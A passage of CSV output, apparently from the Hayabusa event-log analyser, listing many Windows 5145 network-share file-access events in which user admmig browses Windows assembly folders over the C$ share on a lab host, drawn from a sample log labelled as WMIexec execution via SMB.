+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\apppatch\en-US : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\AppReadiness : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.464 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_32\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_64\Microsoft.Interop.Security.AzRoles\2.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.479 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.ManagementConsole.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Diagnostics.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.495 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.PowerShell.Security.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.511 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Management.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\Microsoft.WSMan.Runtime\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCEx.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon\3.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.526 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\MMCFxCommon.Resources\3.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\GAC_MSIL\System.Management.Automation.Resources\1.0.0.0_en_31bf3856ad364e35 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.542 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32 : IP Address: 